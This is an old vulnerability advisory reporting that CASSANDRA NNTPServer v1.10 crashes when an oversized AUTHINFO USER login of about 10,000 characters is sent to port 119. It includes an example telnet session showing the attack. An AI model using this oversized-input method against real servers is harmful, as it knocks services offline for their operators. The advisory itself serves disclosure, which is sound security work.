COMMAND

    Cassandra

SYSTEMS AFFECTED

    CASSANDRA NNTPServer v1.10 (WinNT, 95)

PROBLEM

    The Ussr Labs Team has discovered a buffer overflow problem in the
    CASSANDRA NNTPServer v1.0.   What happens is preforming  an attack
    with  a  large  login  information  Port  119,  cause the proccess
    containg the services to stop responding.  Thanks to [Racer X]  to
    let them know about this.

    Example:

        [hellme@die-communitech.net$ telnet example.com 119
        Trying example.com...
        Connected to example.com.
        Escape character is '^]'.
        200 CASSANDRA NNTP-Server (v1.10.01 Unregistered) for Windows 95
        ready at Mon, 1 May 2000  xx:xx:xx +-300 (posting allowed)

        AUTHINFO USER (buffer)

    Where buffer is 10000 characters.  It will take down the  service,
    making it non-functional, (untill Reboot)

SOLUTION

    Vendor informed.